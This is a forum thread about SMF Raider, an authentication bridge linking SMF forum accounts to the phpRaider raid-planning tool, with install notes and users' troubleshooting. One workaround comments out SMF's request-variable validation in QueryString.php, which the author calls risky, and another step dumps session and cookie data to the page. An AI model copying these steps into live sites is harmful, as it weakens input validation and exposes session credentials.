SMF Raider

SMF Authentication module for phpRaider (www.phpraider.com)
Version: 1.01
Author: Korpus (http://www.phpraider.com/index.php?action=profile;u=5930)

-- Download --

It is attached to the bottom of this post.

-- Requirements --

SMF php forum software (www.simplemachines.com)
phpRaider (www.phpraider.com)

-- Tested --

SMF: 1.1.2 / 1.1.3
phpRaider: 1.0.2
Web Server OS: Linux
Server Software: Apache/1.3.33
MySQL Version: 5.0.22
PHP Version: 5.2.0

*If you have gotten this to work on different combinations then please feel free to email me*

-- How does this work/what does it do --

Version 1.0 onwards offers some rather large changes than in previous versions. (See Installation instructions for more information)

SMFRaider allows you to synchronizes your user database from an install of SMF forums to that of PHPRaider, your users will be able to login into your forum and upon visiting your PHPRaider install be automatically logged in.

It presumes that the end user already has created an account on the SMF forums and is logged in, otherwise the user will be treated as a guest by PHPRaider.

Upon logging into phpRaider (with their SMF username/password) this module will check to see if they have valid contextual information held by SMF, if so it creates a new profile inside the phpRaider structure and allows the user to login. If you have the group check enabled then the user must be flagged as part of the defined groupID within SMF to gain access. If multiple groups are specified then the user must belong to at least one group to be able to login.

If the user already exists in the phpRaider database then they will login as normal.

Anyone flagged as an 'administrator' will be added as a 'superuser' automatically upon their first login into PHPRaider. Everyone else will be added as the default member group.

All permissions within phpRaider will need to be assigned inside of the tool, all this bridge does currently is just create the account automatically for the end-user plus checks to see if they are logged into SMF passing the details onto PHPRaider.

-- What it does not do --

It does not assign any permissions or groups based on SMF groups, it just checks if they have a valid username/password and if enabled, that they belong to a one of a specified SMF group(s) which is allowed to access PHPRaider?

If you have any questions/code changes please share them at the www.phpraider.com forums or feel free to email me at the address above.

-- How do I install this Authentication module --

IT IS HIGHLY RECOMMENDED TO INSTALL SMFRAIDER AS PART OF A FRESH 1.0.2 INSTALL - This is due to the complete overhaul of how SMFRaider intergrates with SMF.

One of the core changes is to link the SMF userID to that of the PHPRaider userID, meaning if you use this on a existing install people can log in as different people (very bad).

I will not support anyone trying to do an 'upgrade' install so if you try to upgrade you do so at your own risk!

Step 1: Extract and FTP the files contained within the archive; header.php, logout.php and /authentication/smf, to your <phpraider directory> overwriting other files as required.
Step 2: Install your PHPRaider as normal.
Step 3: Select SMF from the authentication options when prompted
Step 4: Fill out the values as prompted by the installer
Step 5: If you are already logged into SMF you should be able to access PHPRaider immediately.

-- Known Issues --

Logout is a little unusal/buggy. Unfortunately I need some things added to PHPRaider before I can completely intergrate between the two. Until this happens you will have to install the modified header.php and the logout.php, these allow SMF to properly control sessions data/logout. In a future version SMF login/logout boxes will be fully intergrated into PHPRaider.

'Invalid Request Variable' error when creating a character - This is caused by PHPRaider's passing of numeric parameters in the query string. There are two ways of resolving this error:

1. Remove all numeric attributes form the character creation process, or in my case I just removed all attributes from my characters (users never updated them anyway. This is my RECOMMENDED option.

2. You can comment out the numeric key value check from {SMF}/Sources/QueryString.php

FIND (Around line 99):

foreach (array_merge(array_keys($_REQUEST), array_keys($_FILES)) as $key)
if (is_numeric($key))
die('Invalid request variable.');

REPLACE WITH:

/* Commented out, PHPRaider numeric keys fix
foreach (array_merge(array_keys($_REQUEST), array_keys($_FILES)) as $key)
if (is_numeric($key))
die('Invalid request variable.');
*/

This will fix the check when creating new characters, I personally DO NOT reccommend this option and anyone using it does so at their own risk.

-- FAQ --

Q. Do I need to delete anything else in the authentication folder?
A. No, just follow the install steps above and *fingers crossed* everything will work :)

Q. My user tries to login and cannot but there is no error message'?
A. If you have 'allowed groups' setting enabled, make sure they belong to a group with one of the allowed IDs

Q. How do I find out the group id of a member group?
A. If you go into your SMF admin panel and go to membergroups, you should see the group id in the URL for the link to edit them.

Q. Nobody can log in, not even an admin?
A. For SMFRaider to work you need to make sure you install it on the same domain as the SMF forum, so www.phpraider.com is different from www.phpraider.net or even smf.phpraider.com. Preferably your PHPRaider install should be in a subdirectory of your SMF install.

Q. Did you always have to have SMF on the same domain as PHPRaider?
A. No this is a major change in this version

Q. Can I use SMFRaider if my SMF is installed in a different database to PHPRaider?
A. In theory yes, but untested at this time (let me know if this works for you).

Q. I would like to ask you a question or report a bug?
A. Please either email me (above) or use the forums at www.phpraider.com - http://www.phpraider.com/index.php?topic=1045

Q. Do you have an IRC Channel I could contact you
A. Yes I'm always lurking in the phpraider irc channel. irc.quakenet.org #phpraider

Q. I am logged into SMF but not PHPRaider what is happening?
A. Firstly make sure SMF and PHPRaider are installed on the same domain. If that is the case then on some server configurations PHPRaider should be installed into a sub-directory of SMF, though this can be changed in SMF on most (not all) servers.

Go into your Admin panel of SMF. Then to Server Settings > Feature Configuration then make sure the two following settings are set:

Enable local storage of cookies - Unticked
Use subdomain independent cookies - Ticked

Then if you had to change either/both of these settings get all your users to delete any cookies related to your forum/logout and back in again.

Then you will see that PHPRaider starts to receive the correct user information and logs people in.

-- Version History --

1.01 - Minor fixes to the 1.0 code. Resolved the issue with having no membergroups and login not working. Fixed the error that appears on step 6 of the install.
1.0b - Beta version, major overhaul of how SMFRaider works, should be tightly intergrated into SMF now (Recommend you do not upgrade from 0.5 to 1.0)
0.5b - Beta version and first support for the new authentication system brought in by RC9 (also works with RC10)
0.4 - Implemented full session and cookie support. Code overhauled to include SSI functionality.
0.3 - Implemented external tables (Not released to the public)
0.2 - Fixed issuses with mixed case passwords, changed phpRaider profile storage to better match phpRaider (stores password as md5 so you can disable SMF Raider and use phpRaider standalone at a later date)
0.1 - First release of SMF Raider

Okay has anyone used the plugin yet? Did you get it to work, was there more hacking/coding on your side to get it to work?

Thanks

I got it installed and working fine. Thanks for the good work. :)

Didn't have to do any hacking other than setting up some values that you documented. It would be nice if your mod would recognize the SMF cookie for automatic authentication (or maybe I'm not wording this properly), but it is nonetheless way better than maintaining two seperate authentication databases. :)

However, you do realize that SpiffyJr already has that planned, right? Sounds like what you did may become obsolete.

of course but I doubt an SMF plugin is in the works anytime before a public release, perhaps this bridge will even be included in RC8. At the end of the day I wanted to start using phpRaider straight away for my guild and we needed intergration with SMF so I made it and thought I would share it with everyone :)

If it gets replaced by something better then cool, but at least we have this in the meantime :)

From personal testing of the RC8 core module, phpbb authentication bridges the cookies between the two, however, phpbb is the master module, so if you log in on phpbb, you automagically log into phpraider. I haven't tested it backwards yet.

However, you can use this as a springboard later on if you'd like Korbin.

I'll wait until RC8 is out as I was informed the auth code has changed quite a bit, when I get a look at the new system then I should be able to see how easy it is to add direct cookie support.

kk :)

Korpus,
Everything was installed and appeared to work correctly. However, we've found several issues that we simply can't figure out. So far 3 to 4 out of 25-30 people have had this problem.

Problem:
1. If a user changes their password within SMF, the phpRaider database doesn't appear to update. When they try to log into phpRaider, it refers them to the phpraider.php authentication file (which is in the authentication folder still...instructions weren't clear on that issue.) and it throws them back to the login screen. If I remove that file from the authentication folder, they return to a blank page.

2. If they are already registered and logged into SMF, (and of course, not read the instructions to NOT register on the phpRaider area) and register on the phpRaider page too, they cannot login to phpRaider using their SMF username and password. Results are the same as above.

We've tried correcting this by having the user clear their cookies & cache. I've also emptied the session id's in the SMF database in hopes of forcing a new session, yet with no luck. It seems like their session ID is permanently glued to their first encounter with phpRaider. (we've also deleted their smf account, created a new one and still the same issue.) We managed to get one guy fixed...who knows how we did it. But what we think happened is that he uninstalled his browser, plus we emptied the Sessions in the database and we logged into his account (on my puter) in order for him to get a new session id.

One other problem: When changing the configuration.php file to smfraider.php It does not update the configuration in the phpRaider admin panel. So, if you need to update the phpRaider configuration, it defaults to phpraider.php for the authentication and not smfraider.php The only work-around is to make sure I always make sure that smraider.php is selected as the authentication method before updating the configuration. (Or removing the file from the authentication folder, but is that safe to do?)

Suggestions? HEELLP! We want to go raiding again! :)

Pop me a private message if I left something out.
Thanks!
Emerald

P.S.
Server configuration is equivalent to what you required and I'm running phpRaider 1.0.0.rc7 & SMF 1.1.2

Korpus,
Everything was installed and appeared to work correctly. However, we've found several issues that we simply can't figure out. So far 3 to 4 out of 25-30 people have had this problem.

Problem:
1. If a user changes their password within SMF, the phpRaider database doesn't appear to update. When they try to log into phpRaider, it refers them to the phpraider.php authentication file (which is in the authentication folder still...instructions weren't clear on that issue.) and it throws them back to the login screen. If I remove that file from the authentication folder, they return to a blank page.


Okay you need to make sure that in the configuration.php it is changed to 'smfraider' - as far as I understand the 'configuration' section of phpRaider is just a front end to writing that file (Spiffy can correct me if I'm wrong), no config data is stored anywhere else other than that file.


2. If they are already registered and logged into SMF, (and of course, not read the instructions to NOT register on the phpRaider area) and register on the phpRaider page too, they cannot login to phpRaider using their SMF username and password. Results are the same as above.


Well if you have adjusted the options inside the smfraider.php correctly (and changed the file as mentioned) then they cannot register on the phpraider website, it redirects users to register on your SMF when they click on the register link on phpraider.


We've tried correcting this by having the user clear their cookies & cache. I've also emptied the session id's in the SMF database in hopes of forcing a new session, yet with no luck. It seems like their session ID is permanently glued to their first encounter with phpRaider. (we've also deleted their smf account, created a new one and still the same issue.) We managed to get one guy fixed...who knows how we did it. But what we think happened is that he uninstalled his browser, plus we emptied the Sessions in the database and we logged into his account (on my puter) in order for him to get a new session id.


Don't forget, all my auth file does currently is function like a bridge, it basically looks inside your SMF DB tables, checks to see if there is a valid user/password and group combo, then it builds a phpRaider user for you (which is then used in the rest of the tool). From what I can see here it seems that either your users are using weird characters in their passwords that I didn't take into account or the configuration.php/smfraider.php is not correctly setup.

Double check what I mentioned above, if that doesn't work ask your users to change their password to something really simple and lowercase just to test if that is a problem.


One other problem: When changing the configuration.php file to smfraider.php It does not update the configuration in the phpRaider admin panel. So, if you need to update the phpRaider configuration, it defaults to phpraider.php for the authentication and not smfraider.php The only work-around is to make sure I always make sure that smraider.php is selected as the authentication method before updating the configuration. (Or removing the file from the authentication folder, but is that safe to do?)


This unfortunately is something beyond my contol, how the admin page is populated is done by Spiffy, bare in mind that he did not create the admin page with extra auth modules in mind (they are not supported in RC7) though as far as I am aware you can make all the changes in the configuration.php file directly and completely ignore that page (That is what I do)


Suggestions? HEELLP! We want to go raiding again! :)

Pop me a private message if I left something out.
Thanks!
Emerald

P.S.
Server configuration is equivalent to what you required and I'm running phpRaider 1.0.0.rc7 & SMF 1.1.2


If what I suggested doesn't work perhaps you could PM me with a temporary username/password for the phpraider and ftp and I am happy to take a look to see what the cause of your issues are. Personally seeing that it effects a percentage of your user-base and not all of it I'm thinking it maybe a parsing bug of the password if people use strange combination of characters. Though once RC8 is out and I release a new version of this bridge I can look further at certain bugs.

1. If a user changes their password within SMF, the phpRaider database doesn't appear to update. When they try to log into phpRaider, it refers them to the phpraider.php authentication file (which is in the authentication folder still...instructions weren't clear on that issue.) and it throws them back to the login screen. If I remove that file from the authentication folder, they return to a blank page.

I had that happen too on a couple of users. I had to go in my MySQL database and delete their user account from the phpraider_profile table and that worked. It forced smfRaider to "resync".

I have some users with an account name that is different than their WoW's main toon, but use SMF's "Display Name" to change that. However, when they go in phpRaider, their real account name shows up and confuses people so I had to do a lot of name change to some users.

You don't need to delete them from the database manually, just go to the 'member roster' and delete them from there.

Additionally even if their display name is different from their account name we are syncing accounts here, member is not equal to character.

I'll see if I can look into the code that performs an update if a user already exists to double check for any issues there, hopefully RC8 will be out soon so I can start making more improvements.

You don't need to delete them from the database manually, just go to the 'member roster' and delete them from there.

That's doesn't work. Although they no longer show on the roster, they're still in the database. I tried that first and then went directly into the database after and that worked.

Additionally even if their display name is different from their account name we are syncing accounts here, member is not equal to character.

I guess I should've added that it was an expected behavior. I know you're dealing with accounts. I just gave a scenario about why I was going into the database to delete some entries. The way the accounts show up in phpRaider is reminding all my users to use account names of the same name of their main so I got to rename a lot of my users that registered long ago.

You don't need to delete them from the database manually, just go to the 'member roster' and delete them from there.

That's doesn't work. Although they no longer show on the roster, they're still in the database. I tried that first and then went directly into the database after and that worked.


Okay that first part is what I would call a bug in phpRaider so I'm hoping Spiffy fixes this in RC8 as this would require my plugin to be a core-hack to fix (which is not something I want to do), though I'll look into the SQL further to see if anything can be done on the update part.

Additionally even if their display name is different from their account name we are syncing accounts here, member is not equal to character.

I guess I should've added that it was an expected behavior. I know you're dealing with accounts. I just gave a scenario about why I was going into the database to delete some entries. The way the accounts show up in phpRaider is reminding all my users to use account names of the same name of their main so I got to rename a lot of my users that registered long ago.
[/quote]

I suppose I could include an option to take the display name instead of the account name but that really isn't very intuitive, though I'm not adding any new features until there is a 'fixed' login plugin api/methods for me to work with.

Ahh, I can finally respond to your post! I've been having an awful time connecting to the site!

Ok, we were able to fix the problem with a few folks, but it's still not acting correctly.

It seems to dislike certain passwords. Ones with @ in it, sometimes even ones with a mix of Caps & lowercase. And ones that begin with numbers... I know that sounds nuts doesn't it?

I am pretty confident I have it configured correctly. (configuration.php is set to smfraider)

I also removed phpRaider.php from the authentication folder completely! In hopes of preventing the issue from popping up. (I never really got a straight answer as to whether or not to remove it)

We have other issues as well (drop-down table content in character change disappears sometimes) Heading to another forum to post about that. I'm at a loss with why I'm having so many issues. I've used phpRaid in the past....with not nearly this many problems. phpRaider isn't doing so well I'm afraid.

Sorry for the unclear reply, you do not need to remove phpraider.php from the authentication folder for smfraider to work.

The password stuff I'll need to look into, perhaps it is the way either I am decoding the passwords from SMF or it is my usage of 'Like' in the SQL statements.

I'll provide an update once RC8 is out and I've managed to make the changes that version brings.

Thanks Korpus...

You know, I'd help you in a heart-beat if I could, however, my only gift is in making things look pretty, not the down & dirty hard-coding you guys do!

:)

If you'd like, I'll private message you our site address so you can see what I've been up to. I'm a bit paranoid about posting it anywere I use an application. My server was hacked awhile ago (first time ever in 10 yrs!) They grabbed my smf database and wiped the admin accounts.

Yeah anyone that is using smfRaider in a live environment shoot me a PM, I would be more than willing to work alongside an active guild using my plugin to iron out bugs etc.

Unless RC8 comes out this weekend I think the password issue is a big enough annoyance for me to fix in this version (RC7) as I've got some spare time coming up get in touch :)

I have a sneaky suspicion that it may be a bug in the way I decode SMF passwords rather than a problem with phpRaider (unless people have had issues with phpRaider as standalone)

Edit: I've looked into the code and noticed an error, its the case of the password that is the problem, I'll try and get a fix out ASAP.

Edit 2: Okay looked through found some issues with the code which are now resolved on my guild's version. Will package a 0.2 release later tonight that solves the password issues people have been having (hopefully)

Okay I've released version 0.2 for RC7 (Check the OP)

Please can those experiencing troubles give this a go and please update me if this solves the issues your members have been having with their passwords.

If I remember correctly, there was a security patch made in RC4 which changed the allowed characters for the password for security reasons. It was to prevent SQL injections. I wouldn't be surprised if @ was on the list of restricted characters. Or rather, NOT on the list of allowed characters. This would be the source of the cause.. try taking that path.

Well to prevent SQL injection all you need to do is escape the input properly, no need to restrict characters. Anyway it was a missing bracket that meant certain characters were not parsed properly and is fixed in 0.2 :)

Thanks Korpus!
I've updated the site... So I will be your guinea pig. :)

I may private message you via our forums till Spiffy's server calms down again.

Hopefully, we'll test it tonight and see if we can duplicate the problem. I'll also ask a few guildies that had problems before to change their password. I'm totally confident you got it fixed ;D
*woot*

Yeah or always feel free to fire me an email :)

I like the design you did for your phpRaider, any chance of releasing that to the public? :)

thanks...
the css is a bit messy...still needs improvement.

I could probably clean it up and maybe share it with folks after 1.0.0.rc8 comes out. Of course it will need to be tested. (with your help of course) ;D (Spiffy needs cuter icons...I'm looking for an evil grin)

Emerald, this may sound a bit, odd, coming from a moderator, but I was curious if you could toss me a link to your raid page so I could view the template. I'd be willing to toss one back for my own. Overall, I just am kinda curious about what's been done out there.

Thanks

Hi all now that RC8 is out can you please test this module against the RC8 code? It seems to me on my install that SMFRaider version 0.2 works perfectly fine and seems to not need any additional work, which is good news if I can confirm this as I can start on other features.

So please either suggest new features or let me know if SMFRaider works on your RC8 Install.

Edit: Version 0.3 is currently in testing which implements external tables (i.e. you have SMF install in one database and phpraider in another), version 0.4 is planned to have cookie support though I need to do some research into that (so any resources you may find please post into this topic)

Slightly modified title and stickied for ya

Korpus. Is that all that there is different with 0.3? Since SMF and phpRaider are on the same database for my case, staying with 0.2 is fine?

I will be tackling the RC8 upgrade for our guild tonight and I'm making sure I'm prepared.

yeah not a huge difference other than I've tidied the code a little and tested it specifically against RC8 (0.2 code hasn't had rigorous testing against RC8)

As nobody seems to be going crazy for external tables (I needed it for myself if I'm honest) I may just jump to 0.4 for the next public release.

ummm ok im trying to get 0.2 to work with SMF 1.1.1 and RC8 and it is giving me a SQL error ----> http://www.boguild.com/raidertest/ what did i miss?

ummm ok im trying to get 0.2 to work with SMF 1.1.1 and RC8 and it is giving me a SQL error ----> http://www.boguild.com/raidertest/ what did i miss?


You need to tell me what the SQL error is :)

I got smfRaider 0.2 working beautifully with SMF 1.1.1. No problems at all.

http://www.wowsovguard.com/phpraider/

I think I'll just skip 0.3 and upgrade to 0.4 directly when it's up. :)

Error executing SQL statement

Details: SELECT * FROM `smf_members` WHERE `memberName` LIKE "" AND `passwd` LIKE "" LIMIT 1

Error: Table 'boguild3_raidertest.smf_members' doesn't exist

Is your SMF forum installed in the same database as that test version of PHPRaider?

Good news 0.4 is fast approaching a beta release. I have a working synergy with the SMF cookie/session but a few issues handling the logging out currently.

At the present if you want to use cookies you have to logout in SMF, *then* logout in phpRaider (which is a pain) with any luck I'll be able to sync logging out in either SMF or phpRaider logs you out of both when you have the cookie/session option enabled.

[Watch this space!]

no they are different DB i take it i need to have PHPraider instilled in the same DB as SMF?

Until I release my next version, yes.

ok then 2 questions for ya then #1 do you by chance have an ETA on 0.4 yet if it is soon then i will hold out upgrading are main raid sign-ups until then #2 will 0.4 work with the 2 DB merged or will they need to be 2 different DB?

I can't give an ETA as the issues I have come up against are quite a large wall but I hope to resolve them soon, 0.4 will have external tables support as well (so you can use it in a different database from where phpRaider is installed)

ok the reason why i asked was i did not want to have 0.2 running then find out it wont work out too well with the merged DB but i now have it working ty for the help on this :P

Good news, 0.4 will be out sometime in the next 2-48 hours :)

Final testing taking place and some tidying needs to be done to the code but all the issues I was having previously have now been resolved :)

You da man, Korpus! I look at the people having troubles with phpbb2 auth and then feel really grateful for smfRaider! ;)

ok on 0.2 i got this issue and it is randome on who gets it
Fatal error: Call to undefined function: phpraider_logout() in /home/boguild3/public_html/raider/authentication/smfraider.php on line 41

Odd... Line 41 shows pLogout() for me. Not phpraider_logout()

Odd... Line 41 shows pLogout() for me. Not phpraider_logout()


It should say 'pLogout()' on line 41

odd how the heck dd that get changed like that..... o well i have it changed just w8ing on people to tell me that it worked or not :P

Redownload it from the first post. Line 41 has pLogout() on the copy you can download here.

How that got changed is a mystery...

Version 0.4 released with full cookie/session support and external tables!

Version 0.4 released with full cookie/session support and external tables!


Once again all feedback please. Let me know if it is working on your server and what options you are using (Cookie Support, External tables etc)

Cheers

If users have 'Persistant Connection' set with phpRaider then the following error results.


Error executing SQL statement

Details: SELECT * FROM laf_permissions WHERE group_id=''

Error: Table 'laf-smf.laf_permissions' doesn't exist

Its coming from index.php line 84. It appears that your implementation for accessing smf tables in a different db overrides phpRaider's db prefix. Turn off persistant connection and it works great.. I'll letcha know if I hit any other problems.

Thanks for all your hard work thus far.

i cant seem to get the cookies to work every time i go to the phpraider i need to resign in..... does phpraider need to be in smf forums or somthing?

If a user is not in the group defined in $SMF_GroupName and they attempt to login twice, the first time they the proper red error message, but the second time this error is thrown.

Warning: Smarty error: validate: validator id 'username' is not registered. in <phpraider install dir>/includes/classes/smarty/Smarty.class.php on line 1095

Edit: Oh yeah.. this is RC8 and 0.4

i cant seem to get the cookies to work every time i go to the phpraider i need to resign in..... does phpraider need to be in smf forums or somthing?


Where is SMF installed and where is PhPRaider installed? Phpraider needs to be either in the same directory a sub directory of SMF to work. Plus they both most be called using the same domain.


If a user is not in the group defined in $SMF_GroupName and they attempt to login twice, the first time they the proper red error message, but the second time this error is thrown.

Warning: Smarty error: validate: validator id 'username' is not registered. in <phpraider install dir>/includes/classes/smarty/Smarty.class.php on line 1095

Edit: Oh yeah.. this is RC8 and 0.4


The smarty error stuff I believe is a Spiffy thing. Not 100% what causes the error.

i currently have it as a sub directory of SMF does the folder naming have any thing to do with it? b/c i have it named as raid should it be named phpraider or something?

Works like a treat Korpus inc Cookies.

Running with;
Joomla CMS
SMF:1.1.2 using the Joomla bridge from SimpleMachines
All tables are on the same DB

I did have to modify my settings.php in SMF however, had an error like (going from mem here sorry)

Error executing SQL statement

Details: SELECT * FROM ''joomla'.smf_members' WHERE group_id=''

Error: Table ''joomla'.smf_members' doesn't exist

Had to take out the extra quotes..

Apart from that, Good work ;D

~Bob


edit: add more info

i currently have it as a sub directory of SMF does the folder naming have any thing to do with it? b/c i have it named as raid should it be named phpraider or something?


No that is exactly how I have it installed. PM me Optimus as I'll need to look into the specific's of your setup to see what the issue is.

Looks like I spoke too soon.. :-[

Please breifly describe your issue in 2 lines or less:
Unable to create a new character. About 95% Sure it is from the SMF Auth. Reason for this is I installed a Vanilla version of RC8 using raiderauth and it worked

Is there a software produced error message: (If applicable)

Invalid request variable.


Steps you performed to create this bug or error message:
1. Set to SMF Auth as per instruction - tested with cookies - Confirmed
2. Create a new test account, ensure 'auto logs' into phpraider - Confirmed
3. Check all permissions set to user is applied correctly - Confirmed
4. Create > Character
5. Fill in details, Hit submit - Get Error


Can you easily repeat this error with these steps, or is it random/sparatic?
Yep

Any other information (Such as Group permissions, SQL version, Internet browser) that can assist us in fixing it?
Joomla! CMS
SMF 1.1
Joomla! - SMF bridge from SimpleMachines
Using SMF module to manage all user logons/creatons

Do you have a solution to suggest? If so, what is it?
nope

Is there anything else that you can suggest or comment on that may assist with this issue?
Sorry no.

This maybe a combo of Joomla and SMFRaider, you already mentioned that SMF works differently when using Joomla.

Is this in IE or in Firefox?

Finally do you have debug mode for phpraider enabled?

Tried in both IE and Firefox.

Debug is going and picking up all the session data as it should on the creation screen

Dumping $_SESSION ...
-> rand_code: 7a80893743ddf7b8d199b3228e59d7e2
-> ID_MSG_LAST_VISIT: 434
-> unread_messages: 0
-> USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
-> profile_id: 7
-> session_logged_in: 1
-> initiated: 1
-> username: Nozy
-> email: ######@### [edited]
-> group_id: 3
-> timezone:
-> dst:
-> SmartyValidate: Array

Dumping user permissions ...
-> allow_signup: 1
-> view_members: 1
-> view_raids: 1
-> view_roster: 1
-> view_history_own: 1
-> edit_characters_own: 1
-> edit_raids_own: 1
-> edit_raids_any: 1
-> edit_subscriptions_any: 1
-> edit_raid_templates: 1

Dumping $_POST ...



I thought it might have been Joomla! too, but I tried it by removing the Joomla! wrapper around the whole lot, so the site is running independently and I am still getting the same result. Big white screen with nothing but

Invalid request variable.

On it.. very strange

Can you PM or email me a dump of your PHP_INFO() and send me your configuration.php and Settings.php (please edit pass/usernames out first)

Unless there is some naming collision going on I find it strange as SMFRaider does not alter the way the user is handled inside PHPRaider it just bridges to it and then lets PHPRaider get on with managing its own users.

Korpus have you got my PM yet? also if you want you can IM me at deusexb on AOL

Well do later when I get a chance/get home from work,

However, in playing a little, I can tell you that the only time this error message only appears is when $SMF_UseSessionCookie is set to True.

When its on false, SMF raider works fine (like your old version; check to see if the user is registered with SMF, copies over the username/password/email when the user logs in etc) just obviously not auto sign-in though.

Cheers
~Bob

PM'ed to you Korpus.

Cheers
~Bob

However, in playing a little, I can tell you that the only time this error message only appears is when $SMF_UseSessionCookie is set to True.


Does the system with JOOMLA output a cookie. Basically what the software does is checks to see if there is a $_SESSION for SMF. If there is no session stuff it then checks $_COOKIE[$cookiename].

Around line 100 in smfraider.php find:

if(empty($username) || empty($pass)) // Session data did not load properly check the cookie
{
$user_data= unserialize($_COOKIE[$cookiename]);
$username = $user_data[0];
$pass = $user_data[1];
}
}

Add below:

echo '<pre>';
var_dump($_SESSION);
var_dump($_COOKIE);
var_dump($user_data);
echo '</pre>';


Please send me the output from that or if it appears null.

Is this the data you were after?

array(4) {
["rand_code"]=>
string(32) "11be85cf0e28e1a7de9f1bedc754425e"
["ID_MSG_LAST_VISIT"]=>
string(3) "435"
["unread_messages"]=>
int(0)
["USER_AGENT"]=>
string(90) "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
}
array(9) {
["username"]=>
string(0) ""
["password"]=>
string(0) ""
["jalUserName"]=>
string(3) "Bob"
["27ee4138f52767cc71d92ecf5427cab9"]=>
string(66) "7a0a47cd5bf2c516b1b6f045ab867d34626cb2a550f03d47b0 0b75568e4b953b63"
["CDCookie"]=>
string(95) "a:4:{i:0;s:1:"2";i:1;s:40:"3646da18944732c7af09af8086a4d4f9fbdf7e99";i:2;i:1369550496;i:3;i:0;}"
["usercookie"]=>
array(2) {
["username"]=>
string(3) "Bob"
["password"]=>
string(32) "edited - was there in MD5(think) "
}
["jalUrl"]=>
string(7) "http://"
["PHPSESSID"]=>
string(32) "0b8fbd828d40a8dbc5cdc3b4dbb789ab"
["f058f16d81dd608839551d1ca7a8cd7e"]=>
string(32) "83094750e2466a0c496bedf269e08846"
}
array(4) {
[0]=>
string(1) "2"
[1]=>
string(40) "3646da18944732c7af09af8086a4d4f9fbdf7e99"
[2]=>
int(1369550496)
[3]=>
int(0)
}

phpRaider - Raid management made easy!

~Bob

In your SMF database in the _members table is there anything set inside of the 'salt' field? Plus is the $cookiename field in your Settings.php (SMF folder) set to 'CDCookie'?

With the 'Salt' field in the DB your talking about 'passwordSalt' - then yes, there is like a 4 digit code for everyone

In Settings.php the following variable is set

$cookiename = 'CDCookie'; # Name of the cookie to set for authentication.

I can try setting a diffrent name for the cookie if you like?

Also, let me know if you need any more info.. I can even zip up all my files and send them to you.

Cheers
~Bob

Using your latest release with RC8 and SMF 1.1.2 an keep getting this:

Error executing SQL statement

Details: SELECT * FROM `smf_members` WHERE `memberName` = "" LIMIT 1

Error: Table 'handsof_phpraider.smf_members' doesn't exist

Any ideas what I am doing wrong?

As I thought it now supported SMF's database being seperate from PHPraiders etc (although they are both hosted on same server etc)

With the 'Salt' field in the DB your talking about 'passwordSalt' - then yes, there is like a 4 digit code for everyone

In Settings.php the following variable is set

$cookiename = 'CDCookie'; # Name of the cookie to set for authentication.

I can try setting a diffrent name for the cookie if you like?

Also, let me know if you need any more info.. I can even zip up all my files and send them to you.

Cheers
~Bob


Yeah remove the passwords etc and I'll look into deploying your code on my test server to see what happens.


Using your latest release with RC8 and SMF 1.1.2 an keep getting this:

Error executing SQL statement

Details: SELECT * FROM `smf_members` WHERE `memberName` = "" LIMIT 1

Error: Table 'handsof_phpraider.smf_members' doesn't exist

Any ideas what I am doing wrong?

As I thought it now supported SMF's database being seperate from PHPraiders etc (although they are both hosted on same server etc)


Did you correctly edit the smfraider.php and make sure you enabled external tables option as well as point it towards your SMF directory?

I have it pointed here formy forums:

/home/handsof/public_html/forum2/ (thats pretty right afaik, although not sure about the trailing /)

Also I cant see where in smfraider.php to get it to use the external db?
(i may just be blind, but been playing with my server all day on other things so may have gone code dense!).

NEVERMIND - I am a rtard it seems - need to set Ext to True.....

Looks like I may be close to getting it to work, however I am getting Warning: Smarty error: validate: validator id 'username' is not registered. in /home/handsof/public_html/phpRaider/includes/classes/smarty/Smarty.class.php on line 1095

come up following a red error message saying pass/nick etc arent valid.

I appreciate it may be a spiffy thing, however any ideas you may have would be sweet, as I want to unviel this asap and if users dont have to signup to something new they will use it more (am sure I am surrounded by technophobes!)

Looks like I may be close to getting it to work, however I am getting Warning: Smarty error: validate: validator id 'username' is not registered. in /home/handsof/public_html/phpRaider/includes/classes/smarty/Smarty.class.php on line 1095

come up following a red error message saying pass/nick etc arent valid.

I appreciate it may be a spiffy thing, however any ideas you may have would be sweet, as I want to unviel this asap and if users dont have to signup to something new they will use it more (am sure I am surrounded by technophobes!)


Okay clear your phpRaider cookies and log into SMF, go back to phpRaider and it should be working fine now *crosses fingers*

I'm getting these error's below. Mind you I'm using this on a SMF/TinyPortal installation, which might be the cause of it. If I enable cookies I get a lot more error's and phpraider won't start.

Warning: include_once() [function.include-once]: URL file-access is disabled in the server configuration in /www/s/t/o/domainname.eu/public_html/phpraider/authentication/smfraider.php on line 47

Warning: include_once(http://www.domainname.eu/aof/Settings.php) [function.include-once]: failed to open stream: no suitable wrapper could be found in /www/s/t/o/domainname.eu/public_html/phpraider/authentication/smfraider.php on line 47

Warning: include_once() [function.include]: Failed opening 'http://www.domainname.eu/Settings.php' for inclusion (include_path='.:/usr/local/share/pear:/www/scripts/webshop:/www/scripts/public') in /www/s/t/o/domainname.eu/public_html/phpraider/authentication/smfraider.php on line 47

Korpus did you get my pms? im still unable to figure out why the cookes are not working.

@Optmus - Whats the error your actually getting?

@Golin - My *guess* for an error like that is you have the wrong value in the $SMF_PATH variable in your smfraider.php. It needs to be your absolute path to your SMF install.. eg. somthing like $SMF_PATH = '/home/public_html/SMF/';

@Korpus - What files would you like? - I can provide you ftp access to my site if you like (if that would be easier?)

~Bob

@ bbb: that indeed did the trick. Thanks!

edit: aarghhhh: on logout:
Fatal error: Cannot redeclare ssi_shutdown() (previously declared in /www/s/t/o/domainname.eu/public_html/SSI.php:192) in /www/s/t/o/domainname.eu/public_html/SSI.php on line 194

@Golin...

Same problem, different location. I would check what you have set in your settings.php inside your SMF folder.

If you still have the problem, paste up just the variable settings part of your (SMF)settings.php and your Smfraider.php (REMOVING YOUR PASSWORD AND USERNAME of course)

~Bob

@Optmus - Whats the error your actually getting?


it is not en error it is just not using the cookie feature. every one needs to relog in every time they visit the phpraider

HOLY CRAP I WORKED IT OUT!!!

Golin got me thinking about the SSI and security and validation of the cookie..

If you get the error when creating a new toon

ERROR
Invalid request variable.

Then do this:

OPEN
SMF/Sources/QueryString.php

FIND

// These keys shouldn't be set...ever.
if (isset($_REQUEST['GLOBALS']) || isset($_COOKIE['GLOBALS']))
die('Invalid request variable.');

// Same goes for numeric keys.
